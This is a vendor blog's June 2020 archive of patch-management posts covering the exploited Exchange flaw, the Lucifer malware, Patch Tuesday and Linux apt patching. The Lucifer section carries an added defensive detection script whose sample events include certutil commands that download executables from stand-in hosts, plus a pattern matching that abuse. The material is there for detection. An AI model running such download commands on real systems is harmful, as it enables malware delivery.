Monthly Archives

June 2020


Attackers Weaponizing Exchange Vulnerability

Category: Patch Management


Microsoft announced that the Exchange vulnerability covered under CVE-2020-0688 is currently being weaponized in the wild.

Attackers Target Vulnerable Exchange Servers

Microsoft is warning its customers that attackers are increasingly targeting unpatched Exchange servers, with a massive increase in activity since April.

In February, Microsoft issued a patch for a vulnerability tracked as CVE-2020-0688, which allows an attacker who already holds valid credentials for any mailbox user to execute code remotely on the Exchange server with SYSTEM privileges and take over the affected server. The flaw affects Microsoft Exchange Server 2010 through 2019.

CVE-2020-0688 Targeted with Exploits

Microsoft has confirmed that CVE-2020-0688, fixed in February by the KB4536988 security update (the corresponding KB number depends on the Exchange version), is being exploited in the wild.

When the fix was released in February, the vulnerability was not immediately assigned a CVSS score. It has since been assigned a score of 8.8, which makes installing the update extremely important.

Robert Brown, Director of Services at Syxsense said, “If possible, try to take a multi factored approach when choosing the patches to deploy each month. Simply relying on the vendor severity or the CVSS score alone is simply not enough.”

Since February, many IT organizations have failed to install this update, which is likely why the vulnerability has been used to compromise Exchange infrastructure in recent targeted attacks.

Keep Your Organization Protected

Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.

In this unpredictable time, detecting software vulnerabilities isn’t enough. Traditional security scanners only do half the job by identifying and tracking possible vulnerabilities and exposure without eliminating the risk.

Combining security scanning and patch management in a single console, our vulnerability scanning feature not only shows you what’s wrong, but also deploys the solution. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patching and security scans. Insights into the OS misconfigurations and compliance violations reduce your attack surface and increase peace of mind.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

COVID-19 Causes Increase in Cyberattacks

Category: News


As the world continues to face COVID-19 and cyberattacks increase, patch management and endpoint security are becoming more challenging for businesses and IT professionals.

Coronavirus is Leading to Growth in Cyber Attacks

As the world continues to battle COVID-19, patching and securing endpoints has become a much bigger challenge for businesses.

A recent survey from Threatpost revealed that 40% of companies reported seeing increased cyberattacks as they enable remote working.

In a joint statement, the European Commission, ENISA, CERT-EU and Europol shared their concerns about COVID-19-related cyber threats:

The coronavirus outbreak has spurred widespread anxiety and forced many people to work from home. Malign actors are actively exploiting these new challenging circumstances to target remote workers, businesses and individuals alike.

Relevant European Union entities are in close contact with one another to track these malicious activities, raise awareness in their respective communities and help protect confined citizens. The European Commission, ENISA, CERT-EU and Europol, among others, will continue to monitor the situation and coordinate as appropriate to ensure a safer cyberspace for the EU and the world.

Despite this call to action, many businesses and IT teams remain unprepared for these attacks. Companies are making infrastructure changes on the fly and opening up corporate networks to potential attackers.

Proactively Protecting Your Organization

A secure, roaming product like Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.



Lucifer Malware Targets Windows Systems

Categories: Blog, News


Experts have identified a new malware called Lucifer that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware is targeting Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. This new variant initially attempts to infect devices by blasting them with attacks in the hopes of exploiting any number of unpatched vulnerabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software are strongly advised.”

In a blog post, the researchers said the latest variant of Lucifer was discovered on May 29 while investigating the exploitation of CVE-2019-9081, a bug in the Laravel Framework that can be abused to achieve remote code execution. The malware also exploits many other vulnerabilities, including ones in Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle WebLogic (CVE-2017-10271), and ThinkPHP (CVE-2018-20062), among others.

How Lucifer Malware Infects Targets

Once it has a foothold, whether by exploiting one of the vulnerabilities above or by brute-forcing credentials, the malware connects to its command-and-control (C2) server to receive arbitrary commands, which include launching TCP, UDP, or HTTP denial-of-service attacks. It also spreads to other hosts by brute-forcing credentials over IPC, WMI, SMB, and FTP, as well as MSSQL, RPC, and network shares.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If SMB is reachable, Lucifer also launches the EternalBlue and EternalRomance exploits and drops the DoublePulsar backdoor against the target to propagate further. Researchers say Lucifer also attempts to evade detection and reverse engineering with anti-sandbox capabilities, including checks for device drivers, DLLs, and virtual devices that indicate an analysis environment.

Researchers discovered two versions of the malware: one first observed on May 29 and a second that “wreaked havoc” on June 11. The developer of the malware calls it Satan DDoS, but since other malware families already use that name, the researchers at Palo Alto decided “Lucifer” was more fitting.
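The propagation behaviour described above gives defenders one concrete thing to hunt for: certutil being used as a downloader. The following is an added shell example, not code from the original post or from Unit 42, that sweeps exported Windows process-creation events for that pattern. The post does not give Lucifer's exact command line, so the pattern is the generic "certutil -urlcache ... -f <URL>" download form; the event lines are constructed, not real telemetry, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original post or from Unit 42: a
# detection sweep over exported Windows process-creation events for
# certutil being used as a downloader, the living-off-the-land
# technique the post says Lucifer uses to propagate. The post does not
# give Lucifer's exact command line, so the pattern below is the
# generic "certutil -urlcache ... -f <URL>" download form.
# SAMPLE_EVENTS is constructed, not real telemetry; fields are
# time|host|user|command line. On a live system feed an export of
# Security Event ID 4688 or Sysmon Event ID 1 in the same shape.

SAMPLE_EVENTS='2020-06-11T02:14:07Z|WS-0412|CORP\svc_sql|certutil.exe -urlcache -split -f http://203.0.113.9/spread.exe C:\Windows\Temp\spread.exe
2020-06-11T02:14:09Z|WS-0412|CORP\svc_sql|C:\Windows\Temp\spread.exe
2020-06-11T09:30:11Z|WS-0099|CORP\jsmith|certutil.exe -hashfile C:\Users\jsmith\setup.msi SHA256
2020-06-11T10:02:55Z|SRV-DB01|NT AUTHORITY\SYSTEM|CertUtil.exe -urlcache -f https://198.51.100.77/x.txt C:\ProgramData\x.txt
2020-06-11T10:05:00Z|WS-0099|CORP\jsmith|notepad.exe C:\Users\jsmith\notes.txt'

# flag_certutil_downloads: print events whose command line (field 4)
# runs certutil with -urlcache and a URL. Matching is case-insensitive
# and restricted to the command-line field, so benign uses such as
# -hashfile or -verify are not flagged.
flag_certutil_downloads() {
    printf '%s\n' "$1" | awk -F '|' '
        tolower($4) ~ /certutil(\.exe)?[ \t].*-urlcache.*(https?|ftp):\/\// { print }'
}

# suspicious_hosts: distinct hosts (field 2) behind the flagged events,
# i.e. the machines to isolate and image first.
suspicious_hosts() {
    flag_certutil_downloads "$1" | awk -F '|' '{ print $2 }' | sort -u
}

flag_certutil_downloads "$SAMPLE_EVENTS"
suspicious_hosts "$SAMPLE_EVENTS"
```

Run against the constructed sample, the sweep flags the two download lines and reports WS-0412 and SRV-DB01, while the legitimate certutil -hashfile call on WS-0099 is left alone. Brute-force activity over SMB, RPC and MSSQL, the other infection vector the post describes, is better hunted through failed-logon events and is outside this example.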

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, the researchers recommend that enterprises protect themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can resolve vulnerabilities across an entire environment, whether on-premise or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, greatly reduces an organization's exposure to rising ransomware and other malware events.


Microsoft Releases Six Out-Of-Band Updates

Categories: News, Patch Management


Microsoft released six new out-of-band optional updates for Windows 8.1, 10, and Server 2012 to fix reported printing issues.

New Out-Of-Band Updates Released

On June 22, Microsoft released six out-of-band Optional updates for Windows 8.1, 10, and Server 2012 to fix reported printing issues.  The following updates have been released:

  1. KB4567523 for Windows 10 Version 2004
  2. KB4567515 for Windows 10 Version 1709 Enterprise/Education
  3. KB4567517 for Windows 10 Version 1607 LTSB 2016
  4. KB4567518 for Windows 10 Version 1507 LTSB 2015
  5. KB4567521 for Windows 8.1 / Windows Server 2012 R2
  6. KB4567522 for Windows Server 2012

These are optional updates, so if you are using Windows Update, they will not install by default.

Robert Brown, Director of Services for Syxsense said, “We are recommending all of our clients deploy these updates because there is no definitive list of printers impacted by this vulnerability. We have heard some instances where the print spooler may crash or cause the application itself trying to print to crash.”


June Third-Party Patches and Security Updates

Category: Patch Management


Explore June's third-party and security updates and find out which patches should be prioritized this month to protect your environment.

June Third-Party Patch Updates

It’s been an interesting month for Microsoft updates, considering the June 2020 Patch Tuesday released patches for 129 CVEs covering Windows, Microsoft browsers, and other apps. But what about the other updates?

When it comes to vulnerabilities on Windows endpoints, Microsoft's own updates account for only roughly 20%; the remaining 80% come from other vendors such as Adobe, Google, Mozilla, and Oracle. Below we highlight the updates released since the beginning of the month.

June 2020 Adobe Updates

Adobe is known for releasing many critical security fixes for its software suite every month. Surprisingly, this month brought only a handful of updates (10 CVEs) for Adobe Flash, Experience Manager, and Framemaker. The critical Flash update resolves a use-after-free bug that could allow remote code execution. The Framemaker update is also rated Critical and corrects a single memory corruption bug and two out-of-bounds write bugs. The Experience Manager update is rated Important and addresses six bugs, most of them cross-site scripting flaws and a few server-side request forgery (SSRF) flaws.

It should be noted that none of the bugs Adobe has patched are listed as publicly known or currently being weaponized.

Google Chrome Patches

The Google Chrome browser is widely used across the globe by consumers and businesses alike, and deserves attention next because of its high-severity update at the very beginning of June as well as its latest release on June 15. The desktop release at the beginning of the month (v.83.0.4103.97) included 5 security fixes, covering use-after-free bugs in WebAuthentication and payments, incorrect security UI in payments, and insufficient policy enforcement in developer tools. It also included medium-severity fixes for Chrome on iOS.

The latest release (v.83.0.4103.106) includes more high-severity fixes: a use-after-free in speech, insufficient policy enforcement in WebView, and an out-of-bounds write in V8. It applies to all desktop platforms (Windows, Mac, and Linux), and Google stated it will “roll out over the coming days/weeks.”

Latest Firefox Updates

Mozilla Firefox, another very popular web browser, shipped a number of security fixes across multiple releases at the beginning of June. On June 2, Firefox 77 and Firefox ESR 68.9 were released with 6 high-severity fixes, 1 moderate and 2 low. These resolve a timing attack on DSA signatures in the NSS library, a use-after-free in SharedWorkerService, a JavaScript type confusion with NativeTypes, and memory safety bugs in v.77 and v.68.9. The lower-severity fixes address WebRender leaking GPU memory when using the border-image CSS directive, and URL spoofing with IP addresses or Unicode characters.

The day after releasing Firefox 77, Mozilla released v.77.0.1 to “disable automatic selection of DNS over HTTPS providers during a test to enable wider deployment in a more controlled way,” Mozilla stated on its site. Mozilla also released v.68.9.0 of its mail client, Thunderbird. This version fixes custom headers added for searching or filtering that could not be removed, and the Calendar Today Pane updating before all data had loaded, and includes stability improvements and various security fixes. There are 5 high-severity fixes, some shared with Firefox v.77, as well as a fix for a security downgrade with IMAP STARTTLS leading to information leakage.


Zoom Continues to Release Updates

Zoom, which has seen an exceptional influx of consumer and business users, has been updated frequently amid a mix of security concerns. Zoom v.5.0.5 (26213.0602) was released earlier this month and restores GIPHY support in Zoom chat, resolves minor bugs, and adds new chat features (improved transparency of channel privacy controls, and allowing public channel admins and members to add external users).

The latest release, Zoom v.5.1.0 (27830.0612), allows meeting hosts to unmute all participants in meetings of 200 participants or fewer. It also includes some minor bug fixes (not referenced in the release notes) and new or enhanced features (a webinar option to delete questions, and phone features including personal locations for nomadic emergency services, reconnect options, enhancements to hiding outbound caller ID, and display names for phone numbers). This update also includes enhancements and fixes for Mac, Linux, Android, iOS, and web users.

Other June Third-Party Updates

Skype v.8.61.0.87 was released mid-June. Although Microsoft has not (at the time of writing) updated its FAQ with the latest release notes, a Microsoft moderator pointed out that the only “visible” change is that moderated groups are now explicitly labelled “Moderated Group,” and TechSpot highlighted an improved chat experience with “more spacing between contacts and chats, as well as message previews for unread chats, making it even easier to follow conversations.”

Notepad++ remains extremely popular as a better alternative to the standard Notepad included with Windows. The latest version (v.7.8.7) includes a number of enhancements and bug fixes, such as improved Document Map precision, a fix for lost Find/Replace history, detection of file-reading failures caused by network problems, and CTRL-M as the default shortcut for the Mark dialog.

Last, but not least, Cisco Webex released v.40.6.2 with a few enhancements: the ability to see the participants’ view of what you are sharing, and guest users can now edit their name or email address from the Preview window. Cisco stated “there’s no more second-guessing whether you’re sharing, and you’ll be confident that attendees are seeing the right content,” and that guests editing their name or email no longer have to go “back to the pre-meeting window of the Webex Meetings desktop app[;] just hover over your name and click to change the information.” No security fixes were specified by Cisco at this time.

Managing Third-Party Updates

Even though third-party products typically introduce more vulnerabilities than the OS itself does, deploying their updates does not have to be a difficult process. A simple and powerful solution with an up-to-date library of third-party products can easily alleviate the burden across an organization.

Syxsense provides all of the updates previously mentioned same-day (including many more) and allows for an exceptionally smooth process with a Patch Deploy task. Simply target all devices for the newest update and the pre-packaged detection will determine if devices do/do not require the update. If they require it, the update will be automatically applied and the vulnerability remediated.


The Best Way to Patch Linux OS

Category: Patch Management


Linux is generally considered a more reliable OS to apply updates to, but not patching will expose your environment just like any other operating system.

How to Patch Linux

If you ever visit a Patch Tuesday article, you will often find comments recommending Linux because of its reliability and lack of updates. This is a common misconception. Each Linux distribution is different, and the example below shows updates that were needed only a week after the server was last fully patched.

Installing individual updates on Linux is relatively easy, but it requires you to know the name (and version) of the package you want to install.

The following process takes some time because it is done from the command line. We recommend you learn the basics of bash (the Bourne Again Shell), the default shell on most Linux distributions, since it will greatly help your understanding of the process. The commands below are for Debian-based distributions such as Ubuntu, which use apt; Red Hat-based systems use yum or dnf instead.

Both experts and the community are right that Linux updates are more reliable, with almost no equivalent of the Blue Screen of Death (BSOD), but that does not mean Linux does not need to be updated.

Getting Started

  1. Establish an SSH session to the server, e.g. with OpenSSH or PuTTY. Do not use Telnet: it is unencrypted and sends your credentials in clear text.
  2. Run the following command: apt list --upgradable 2>/dev/null | grep -- "-security"

Understanding this output is essential, as each line records the package name, the version it will upgrade to, and the version currently installed. For example, the output includes the following line:

apparmor/xenial-updates,xenial-security 2.10.95-0ubuntu2.11 amd64 [upgradable from: 2.10.95-0ubuntu2.10]

Reading the line:

apparmor: name of the package

xenial-updates,xenial-security: the repositories the update comes from; the -security pocket is what the grep above matches

2.10.95-0ubuntu2.11: version the package will be upgraded to

2.10.95-0ubuntu2.10: version currently installed

Where is the Severity and Update Description?

If you are used to Microsoft Windows Update or WSUS, you will notice that this output only gives the name and version of the missing package. Unless you look the package up on the distribution's security site (for Ubuntu, the Ubuntu Security Notices) or read its changelog with apt-get changelog <package name>, you will not know which updates are more important than others, or what the package actually fixes.

Many industry experts consider this knowledge essential when choosing what to prioritize, especially since few teams have the time to install packages that are not security-related or are very low in severity.

Otherwise, how would a Linux administrator know which package fixes a zero-day vulnerability or is absolutely essential to apply? Let's continue with the install process:

  1. Identify the update(s) you wish to install (copy and paste is really useful here)
  2. Run the following command: sudo apt-get install <package name>=<version>, for example sudo apt-get install apparmor=2.10.95-0ubuntu2.11

Security Privileges

Because you are making changes to the system, your account must be allowed to run sudo (for example, through membership in the sudo group or an entry in /etc/sudoers). Also pay attention to the spacing above: the command line needs to be exact in order to be passed correctly to the shell.

If you wish to install several updates at the same time, list the additional package=version pairs on the same line, separated by spaces (not commas).

If you want to update a package to the latest version rather than the specific version that was detected, you can omit the version. However, this is not recommended or considered best practice, because the specific package versions are what you have tested on your servers.

For example: sudo apt-get install apparmor

By default, apt installs packages without rebooting. Be aware, though, that kernel updates (and updates to core libraries such as glibc) only take effect after a reboot; on Ubuntu, the file /var/run/reboot-required is created when a reboot is pending.
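The whole procedure, as an added shell example that is not part of the original post: it parses apt list --upgradable output, keeps only the packages that come from a -security pocket, builds the version-pinned apt-get line, and checks Ubuntu's reboot marker. The sample output is constructed to mimic Ubuntu 16.04 (xenial) and the function names are this example's own; on a real server, pass the live output of apt list --upgradable instead.

```shell
#!/bin/sh
# Added example, not code from the original post: parse the output of
# `apt list --upgradable` for packages coming from a -security pocket,
# and build the exact, version-pinned `apt-get install` line the post
# describes. SAMPLE_APT_LIST is constructed to mimic Ubuntu 16.04
# (xenial) output; on a real server use "$(apt list --upgradable 2>/dev/null)".

SAMPLE_APT_LIST='Listing... Done
apparmor/xenial-updates,xenial-security 2.10.95-0ubuntu2.11 amd64 [upgradable from: 2.10.95-0ubuntu2.10]
libssl1.0.0/xenial-updates,xenial-security 1.0.2g-1ubuntu4.16 amd64 [upgradable from: 1.0.2g-1ubuntu4.15]
vim/xenial-updates 2:7.4.1689-3ubuntu1.4 amd64 [upgradable from: 2:7.4.1689-3ubuntu1.3]'

# security_upgrades: print "package candidate_version installed_version"
# for every line whose repository list includes a -security pocket.
security_upgrades() {
    printf '%s\n' "$1" | awk '
        # $1 is "pkg/pocket1,pocket2", $2 the candidate version; the
        # installed version sits inside "[upgradable from: ...]".
        $1 ~ /\// && $1 ~ /-security/ {
            split($1, parts, "/")
            installed = $0
            sub(/.*upgradable from: /, "", installed)
            sub(/\].*/, "", installed)
            print parts[1], $2, installed
        }'
}

# pinned_install_cmd: join the security packages into one apt-get line,
# pinned to the candidate versions and separated by spaces (apt-get
# does not accept comma-separated package lists).
pinned_install_cmd() {
    pkgs=$(security_upgrades "$1" | awk '{ printf "%s=%s ", $1, $2 }')
    printf 'sudo apt-get install %s\n' "${pkgs% }"
}

# reboot_pending: apt does not reboot, but Ubuntu creates this marker
# file when a kernel or core-library update needs one. An alternative
# path can be given for testing.
reboot_pending() {
    [ -f "${1:-/var/run/reboot-required}" ]
}

security_upgrades "$SAMPLE_APT_LIST"
pinned_install_cmd "$SAMPLE_APT_LIST"
if reboot_pending; then echo "reboot required"; fi
```

On the constructed sample the script keeps apparmor and libssl1.0.0 (both from xenial-security) and drops vim, which only comes from xenial-updates, then prints the single pinned apt-get line to review before running it.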

Patching Linux OS with Syxsense

Syxsense adds many automation benefits to the manual patching method above. With the discovery process, all Linux devices can be detected and inventoried. Our Patch Manager displays the missing packages just like the commands above, but includes the additional information IT managers need: the description, the vendor severity, and the independent CVSS score.

Identifying zero-day updates is made easy by the color coding of the interface. The scheduler used to deploy the updated packages allows flexible timing and reboot behavior to be set with ease. Enable your Linux administrators to use their time more efficiently by letting them automate and report on the patching of your Linux environment.


Watch the Webcast: June Patch Tuesday

Categories: Patch Management, Patch Tuesday, Video

Watch the Webcast: What You Need to Know For June Patch Tuesday

Watch the recording of our latest webcast to hear industry experts dive into June Patch Tuesday and prioritizing the latest updates.

Prioritize June Patch Tuesday Vulnerabilities

As the IT landscape continues to change, it’s never been more important to have a solid Patch Tuesday strategy.

Our webcast will show you how to prioritize the latest updates for this month’s Microsoft Patch Tuesday. We’ll do a deep dive into each of the bulletins and show you how to navigate the risks of newly-identified vulnerabilities.

Our team of IT management experts has deployed over 100 million patches. Join our free webinar to get industry-leading patch management strategies delivered right to your desk.

View the Webcast

What You Need to Know: June Patch Tuesday


Microsoft June Patch Tuesday Fixes 129 Vulnerabilities

Categories: Patch Management, Patch Tuesday


As the biggest Patch Tuesday to date, Microsoft has issued 129 fixes for vulnerabilities in this month's massive update.

June Patch Tuesday Has Arrived with a Bang

Microsoft has released an astonishing 129 patches today, breaking all known records for the number of fixes released in a single month.

There are 11 Critical patches, with the remaining 118 rated Important. Support for Windows 7 and Windows Server 2008 (including R2) officially ended in January, but there are plenty of updates this month for customers who have purchased an extended support agreement.

Robert Brown, Director of Services for Syxsense said, “This brings the number of patches released this year to over 600; if July carries the same cadence we may reach the total number released for the whole of last year. In addition, there have been 10 Adobe updates released today, making this deployment one of the largest we have ever seen. There could be close to 2.3GB of data being delivered to each device – you must prioritize your deployment to reduce the burden on your wide area networks and VPNs.”

Patches of Interest

  1. CVE-2020-1281 – Windows OLE Remote Code Execution – This has the second highest vendor severity and CVSS score this month, and impacts every supported Microsoft operating system.
  2. CVE-2020-1238 & CVE-2020-1239 – Media Foundation Memory Corruption – These impact Windows 10 from feature update 1709 through 2004, plus Windows Server 2019, and have no countermeasure. We have seen other Media Foundation memory corruption vulnerabilities this year, and some have already been exploited as zero days.
  3. CVE-2020-1292 – OpenSSH for Windows Elevation of Privilege – OpenSSH is the open-source Secure Shell (SSH) implementation that was added to Windows 10 and Windows Server 2019; it is widely used by Linux admins and is part of Microsoft's cross-platform capability. The vulnerability stems from OpenSSH for Windows not properly restricting access to its configuration settings, which could let an attacker substitute a malicious binary of their own. Although this only impacts the Windows port and NOT Linux, it is still a patch to prioritize this month.

Experience the Power of Syxsense

Syxsense is a cloud-based solution that helps organizations manage and secure their endpoints with ease. Automatically deploy OS and third-party patches as well as Windows 10 feature updates for Microsoft, Mac, and Linux devices.

Syxsense Recommendations

Based on the vendor severity and CVSS score, we have made a few recommendations below which you should prioritize this month. Please pay close attention to any of these which are Publicly Aware and / or Weaponized.


CVE Ref. | Description | Vendor Severity | CVSS Score | Publicly Aware | Weaponized | Countermeasure | Syxsense Recommended
CVE-2020-1238 | Media Foundation Memory Corruption Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2020-1239 | Media Foundation Memory Corruption Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2020-1292 | OpenSSH for Windows Elevation of Privilege Vulnerability | Important | 8.8 | No | No | No | Yes
CVE-2020-1206 | Windows SMBv3 Client/Server Information Disclosure Vulnerability | Important | 8.6 | No | No | Yes | Yes
CVE-2020-1255 | Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability | Important | 8.5 | No | No | No | Yes
CVE-2020-1248 | GDI+ Remote Code Execution Vulnerability | Critical | 8.4 | No | No | No | Yes
CVE-2020-1281 | Windows OLE Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2020-1300 | Windows Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2020-1286 | Windows Shell Remote Code Execution Vulnerability | Critical | 7.8 | No | No | No | Yes
CVE-2020-1260 | VBScript Remote Code Execution Vulnerability | Critical | 7.5 | No | No | No | Yes
CVE-2020-1299 | LNK Remote Code Execution Vulnerability | Critical | 6.8 | No | No | No | Yes
CVE-2020-1073 | Scripting Engine Memory Corruption Vulnerability | Critical | 4.2 | No | No | No | Yes
CVE-2020-1219 | Microsoft Browser Memory Corruption Vulnerability | Critical | TBC | No | No | No | Yes
CVE-2020-1181 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Critical | TBC | No | No | No | Yes
CVE-2020-1213 | VBScript Remote Code Execution Vulnerability | Critical | TBC | No | No | No | Yes
CVE-2020-1216 | VBScript Remote Code Execution Vulnerability | Critical | TBC | No | No | No | Yes
CVE-2020-1311 | Component Object Model Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1211 | Connected Devices Platform Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1203 | Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1257 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1278 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1293 | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1317 | Group Policy Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1208 | Jet Database Engine Remote Code Execution Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1236 | Jet Database Engine Remote Code Execution Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1222 | Microsoft Store Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1309 | Microsoft Store Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1212 | OLE Automation Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1271 | Windows Backup Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1280 | Windows Bluetooth Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1162 | Windows Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1324 | Windows Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1234 | Windows Error Reporting Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1199 | Windows Feedback Hub Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-0915 | Windows GDI Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-0916 | Windows GDI Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1272 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1277 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1302 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1237 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1246 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1262 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1264 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1266 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1269 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1273 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1274 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1275 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1276 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1307 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1316 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1279 | Windows Lockscreen Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1254 | Windows Modules Installer Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1201 | Windows Now Playing Session Manager Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1231 | Windows Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1233 | Windows Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1235 | Windows Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1265 | Windows Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1282 | Windows Runtime Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No |
CVE-2020-1304 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1306 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1334 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1305 Windows State Repository Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1287 Windows Wallet Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1294 Windows Wallet Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1270 Windows WLAN Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1230 VBScript Remote Code Execution Vulnerability Important 7.5 No No No
CVE-2020-1301 Windows SMB Remote Code Execution Vulnerability Important 7.5 No No Yes
CVE-2020-1284 Windows SMBv3 Client/Server Denial of Service Vulnerability Important 7.5 No No Yes
CVE-2020-1120 Connected User Experiences and Telemetry Service Denial of Service Vulnerability Important 7.1 No No No
CVE-2020-1202 Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1247 Win32k Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1251 Win32k Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1291 Windows Network Connections Service Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1209 Windows Network List Service Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1196 Windows Print Configuration Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1217 Windows Runtime Information Disclosure Vulnerability Important 7 No No No
CVE-2020-1314 Windows Text Service Framework Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1232 Media Foundation Information Disclosure Vulnerability Important 6.5 No No No
CVE-2020-1207 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1253 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1258 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1310 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1244 Connected User Experiences and Telemetry Service Denial of Service Vulnerability Important 6.3 No No No
CVE-2020-1197 Windows Error Reporting Manager Elevation of Privilege Vulnerability Important 6.3 No No No
CVE-2020-1204 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability Important 6.3 No No No
CVE-2020-1160 Microsoft Graphics Component Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1290 Win32k Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1283 Windows Denial of Service Vulnerability Important 5.5 No No No
CVE-2020-1261 Windows Error Reporting Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1263 Windows Error Reporting Information Disclosure Vulnerability Important 5.5 No No No
